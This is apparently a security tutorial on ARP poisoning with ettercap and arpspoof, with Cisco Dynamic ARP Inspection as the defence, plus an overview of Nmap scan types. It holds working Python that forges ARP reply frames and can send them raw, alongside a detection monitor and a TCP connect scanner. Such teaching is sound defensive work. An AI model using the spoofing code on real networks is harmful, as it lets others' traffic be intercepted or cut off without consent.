
ARP Poisoning:

ARP Poisoning, also known as ARP Poison Routing or ARP spoofing, is a network attack that exploits the translation of Layer 3 (IP) addresses into Layer 2 (MAC) addresses on a local network.

ARP (Address Resolution Protocol) operates by broadcasting a request across the local network to determine the Layer 2 address (MAC address) of the host that holds a given Layer 3 address (IP address). The host with that IP address sends a reply containing its MAC address. Once the exchange is complete, the originating device caches the mapping and uses it in the Layer 2 header of every packet it sends to that IP address.

An ARP spoofing attack is the transmission of unsolicited ARP replies. Each forged reply pairs the IP address of a network resource, such as the default gateway or a DNS server, with the attacker's own MAC address. Most network stacks, by design, accept such replies even though they never asked for them and overwrite the existing cache entry for that IP address with the counterfeit mapping. The attacker thereby becomes a man in the middle: any traffic the victim sends to the legitimate resource is delivered to the attacking system instead, which can read or modify it before forwarding it on. Because the attack happens at the lower layers of the OSI model, the end user sees nothing unusual.

ARP poisoning can also be used for Denial of Service (DoS). Instead of posing as the gateway and forwarding traffic as a man in the middle, the attacking system simply drops the packets, so clients lose access to the attacked network resource. In both cases the spoofing of ARP messages is the underlying principle of ARP poisoning.

Attack Vector:

Ettercap is a suite for man in the middle attacks on a LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even encrypted ones) and includes many features for network and host analysis.

Arpspoof (part of the dsniff package) is a small but very powerful tool that sends forged ARP replies to a target, repeating them periodically so that the victim's cache entry does not age out and revert to the real MAC address.

[Figure: ARP poisoning scenario]

The figure above shows the scenario in which we will perform ARP poisoning using the ettercap and arpspoof tools.

Attack:
Step 1: First find the IPv4 address and MAC address of the victim.

Step 2: Launch the attack by running ettercap in command-line (text) mode against the victim and the gateway.

The same can be done with arpspoof, as shown in the screenshot below.

Step 3: Check the host list in ettercap to confirm that the victim has been added as a target for ARP spoofing.

Step 4: The victim is now poisoned: in the victim's ARP table the gateway's MAC address is the same as the attacker machine's MAC address, as the figure shows.

Step 5: As a further check, confirm that the victim's traffic to the gateway is actually passing through the attacker's machine.

For the attacker's machine to act as a router, passing the victim's requests on to the gateway and the gateway's replies back to the victim while sitting in the middle, IP forwarding must be enabled on the attacker with the following command: echo 1 > /proc/sys/net/ipv4/ip_forward. Enable it before starting the poisoning; otherwise the victim's packets are silently dropped and the attack becomes a denial of service rather than a man in the middle.
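The steps above as a worked example, added here and not taken from the original page or from the ettercap or arpspoof sources. It builds the raw Ethernet frame for the same unsolicited ARP reply that arpspoof and ettercap send (Step 2), performs the Step 4 check against a constructed `arp -n` listing of the victim, and includes a small monitor that flags a changed IP-to-MAC binding, which is the host-side counterpart of the switch-based check described under Mitigation. All addresses (the 192.168.1.0/24 lab, the MACs) and the interface name are made-up assumptions; actually sending the frame needs Linux AF_PACKET and root, and is left commented out.

```python
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed lab addresses (assumptions, not from the page).
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "d8:50:e6:01:02:03"
VICTIM_IP, VICTIM_MAC = "192.168.1.50", "00:50:56:11:22:33"
ATTACKER_MAC = "00:0c:29:aa:bb:cc"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def fmt_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def fmt_ip(b):
    return ".".join(str(x) for x in b)


def forge_arp_reply(victim_mac, victim_ip, spoofed_ip, attacker_mac):
    """Ethernet frame carrying an unsolicited ARP reply to the victim that claims
    "spoofed_ip is at attacker_mac".  arpspoof resends this every few seconds so
    the poisoned cache entry never ages out."""
    eth = mac_bytes(victim_mac) + mac_bytes(attacker_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # htype, ptype, hlen, plen, oper
    arp += mac_bytes(attacker_mac) + ip_bytes(spoofed_ip)     # sender: the identity being stolen
    arp += mac_bytes(victim_mac) + ip_bytes(victim_ip)        # target: the victim
    return eth + arp


def parse_arp(frame):
    """Decode the ARP fields of a 42-byte Ethernet/ARP frame."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    oper = struct.unpack("!H", frame[20:22])[0]
    return {"oper": oper,
            "sender_mac": fmt_mac(frame[22:28]), "sender_ip": fmt_ip(frame[28:32]),
            "target_mac": fmt_mac(frame[32:38]), "target_ip": fmt_ip(frame[38:42])}


def send_frame(iface, frame):
    """Put a raw frame on the wire (Linux only, needs CAP_NET_RAW / root)."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


# Step 4 check: constructed `arp -n` output as seen on the poisoned victim.
ARP_N_OUTPUT = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:0c:29:aa:bb:cc   C                     eth0
192.168.1.77                     (incomplete)                              eth0
192.168.1.50             ether   00:50:56:11:22:33   C                     eth0
"""


def parse_arp_table(text):
    """IP -> MAC from `arp -n` output; skips the header and incomplete entries."""
    table = {}
    for line in text.splitlines()[1:]:
        cols = line.split()
        if len(cols) >= 3 and ":" in cols[2]:
            table[cols[0]] = cols[2].lower()
    return table


def gateway_poisoned(arp_n_text, gateway_ip, attacker_mac):
    """True when the victim resolves the gateway IP to the attacker's MAC."""
    return parse_arp_table(arp_n_text).get(gateway_ip) == attacker_mac.lower()


class ArpMonitor:
    """Flags any ARP reply that rebinds a known IP to a different MAC.
    In practice seed the bindings from a trusted source (DHCP leases, a static list)
    rather than from the first reply seen, which an attacker could also forge."""

    def __init__(self, trusted=None):
        self.bindings = {ip: mac.lower() for ip, mac in (trusted or {}).items()}

    def observe(self, frame):
        a = parse_arp(frame)
        if a["oper"] != ARP_REPLY:
            return None
        known = self.bindings.get(a["sender_ip"])
        if known is None:
            self.bindings[a["sender_ip"]] = a["sender_mac"]
            return None
        if known != a["sender_mac"]:
            return f"ARP poisoning suspected: {a['sender_ip']} moved from {known} to {a['sender_mac']}"
        return None


if __name__ == "__main__":
    frame = forge_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_IP, ATTACKER_MAC)
    print(parse_arp(frame))
    print("victim poisoned:", gateway_poisoned(ARP_N_OUTPUT, GATEWAY_IP, ATTACKER_MAC))
    print(ArpMonitor({GATEWAY_IP: GATEWAY_MAC}).observe(frame))
    # send_frame("eth0", frame)  # only on a lab network you own; repeat in a loop to keep the cache poisoned
```

A full man in the middle needs the mirror-image reply as well (telling the gateway that the victim's IP is at the attacker's MAC), plus IP forwarding enabled as described in the text; the monitor only sees the attack if it runs on the victim or on a port that receives the forged replies.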

Mitigation:
Mitigation of ARP Poisoning can be performed on Cisco IOS switches with DAI (Dynamic ARP Inspection), which relies on the DHCP snooping binding table: the switch intercepts ARP packets arriving on untrusted ports, checks the sender IP-to-MAC pair against the bindings learned from DHCP, and drops any packet that does not match, so a forged reply from the attacker's port never reaches the victim. DHCP snooping must therefore be enabled on the VLAN first, with the port towards the DHCP server marked as trusted; hosts with static addresses have no DHCP binding and need an ARP ACL instead. Then enable DAI for the VLAN: ip arp inspection vlan <VLAN ID>

Nmap
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap Help Manual

TYPE OF SCANS
SYN Scan (-sS)
SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections: Nmap sends a SYN, reads the SYN/ACK or RST that comes back, and answers a SYN/ACK with a RST instead of an ACK, so the handshake is never finished and the application on the target never sees a connection. SYN scan works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms as Nmap's FIN/NULL/Xmas, Maimon and idle scans do. It also allows clear, reliable differentiation between the open, closed, and filtered states. It requires raw packet privileges (root on Unix-like systems).

TCP Connect Scan (-sT)
TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when the user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients, and most other network-enabled applications use to establish a connection. Because the handshake completes, the target application sees a real connection and may log it, so this scan is slower and noisier than SYN scan.

FIN, NULL and Xmas Scans (-sF, -sN, -sX)
These three scan types (custom flag combinations are possible with the --scanflags option) exploit a subtle loophole in the TCP RFC to differentiate between open and closed ports. Page 65 of RFC 793 says that if the [destination] port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response. The next page discusses packets sent to open ports without the SYN, RST, or ACK bits set, stating that: you are unlikely to get here, but if you do, drop the segment, and return. When scanning systems compliant with this RFC text, any packet not containing the SYN, RST, or ACK bits will result in a returned RST if the port is closed and no response at all if the port is open. As long as none of those three bits are included, any combination of the other three (FIN, PSH, and URG) is OK. Nmap exploits this with three scan types: the NULL scan sets no flags at all, the FIN scan sets only the FIN flag, and the Xmas scan sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. Because an open port gives no reply, these scans report open|filtered rather than open, and they do not work against stacks that ignore the RFC text (Microsoft Windows, for example, replies with a RST regardless of port state, so every port appears closed).

ACK and UDP Scans (-sA, -sU)
ACK scan (-sA) is different from the others discussed so far in that it never determines open (or even open|filtered) ports. It is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered. The ACK scan probe packet has only the ACK flag set (unless you use --scanflags). When scanning unfiltered systems, open and closed ports will both return a RST packet, and Nmap labels them unfiltered; ports that do not respond, or that return an ICMP error, are labelled filtered.

UDP scan (-sU) works by sending a UDP packet to every targeted port. For some common ports such as 53 and 161, a protocol-specific payload is sent, but for most ports the packet is empty. The --data-length option can be used to send a fixed-length random payload to every port or (if you specify a value of 0) to disable payloads. If an ICMP port unreachable error (type 3, code 3) is returned, the port is closed. Other ICMP unreachable errors (type 3, codes 1, 2, 9, 10, or 13) mark the port as filtered. Occasionally, a service will respond with a UDP packet, proving that it is open. If no response is received after retransmissions, the port is classified as open|filtered. This means that the port could be open, or perhaps packet filters are blocking the communication. Version detection (-sV) can be used to help differentiate the truly open ports from the filtered ones.

Version Detection (-sV)
Version detection sends protocol probes to each port found open (or open|filtered) and matches the responses against Nmap's service signatures to report the application name and version. For UDP in particular, a port that answers one of these probes is proven open, which is why -sV helps differentiate the truly open ports from the open|filtered ones.
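An added example, written for this page and not taken from Nmap itself, that shows the two behaviours described above in plain Python: a TCP connect scan of the kind Nmap falls back to without raw-socket privileges (it relies on the operating system's connect call, so it runs unprivileged, and it classifies a port as open, closed or filtered from the connect result), and the response-to-state rules the text gives for the raw-probe scan types, written out as one function so the differences between SYN, FIN/NULL/Xmas, ACK and UDP scans sit side by side. The host, the loopback listener used to demonstrate an open port, and the timeout are assumptions; the response names are labels chosen here, not Nmap's internal names.

```python
import errno
import socket


def connect_scan(host, ports, timeout=1.0):
    """TCP connect scan (Nmap -sT): ask the OS for a full three-way handshake.
    Returns {port: "open" | "closed" | "filtered"}.  Unlike -sS the handshake
    completes, so the service on an open port sees (and may log) a real connection."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            rc = s.connect_ex((host, port))   # errno instead of an exception
        if rc == 0:
            results[port] = "open"            # SYN/ACK came back, handshake done
        elif rc == errno.ECONNREFUSED:
            results[port] = "closed"          # RST came back
        else:
            results[port] = "filtered"        # timeout or unreachable: something in the path dropped it
    return results


# Port states Nmap infers from a single probe response, per scan type, as described
# in the text above.  The response labels are this example's own names.
SYNACK, RST, NONE = "syn/ack", "rst", "no response"
ICMP_PORT_UNREACH = "icmp 3/3"               # ICMP type 3, code 3
ICMP_OTHER_UNREACH = "icmp 3/other"          # ICMP type 3, codes 1, 2, 9, 10 or 13
UDP_DATA = "udp reply"


def port_state(scan_type, response):
    if scan_type == "syn":                    # -sS: SYN/ACK is answered with a RST, never an ACK
        return {SYNACK: "open", RST: "closed"}.get(response, "filtered")
    if scan_type in ("fin", "null", "xmas"):  # -sF/-sN/-sX: RFC 793 loophole, silence is ambiguous
        return {RST: "closed", NONE: "open|filtered"}.get(response, "filtered")
    if scan_type == "ack":                    # -sA: maps firewall rules, never reports open
        return {RST: "unfiltered"}.get(response, "filtered")
    if scan_type == "udp":                    # -sU: only ICMP 3/3 proves closed, only data proves open
        return {UDP_DATA: "open", ICMP_PORT_UNREACH: "closed",
                ICMP_OTHER_UNREACH: "filtered", NONE: "open|filtered"}.get(response, "filtered")
    raise ValueError(f"unknown scan type {scan_type!r}")


def open_listener(host="127.0.0.1"):
    """Bind a listening socket on an ephemeral port to stand in for an open service."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def reserve_closed_port(host="127.0.0.1"):
    """Find a port that is currently not listening: bind, read the number, release it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    srv, open_port = open_listener()
    closed_port = reserve_closed_port()
    print(connect_scan("127.0.0.1", [open_port, closed_port]))
    srv.close()
    for st in ("syn", "fin", "ack", "udp"):
        print(st, "scan, no response ->", port_state(st, NONE))
```

The last loop makes the practical point of the text concrete: the same silence means "filtered" to a SYN or ACK scan but "open|filtered" to a FIN/NULL/Xmas or UDP scan, which is why those scans need a follow-up such as -sV before a port can be called open.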


Available Options in Nmap
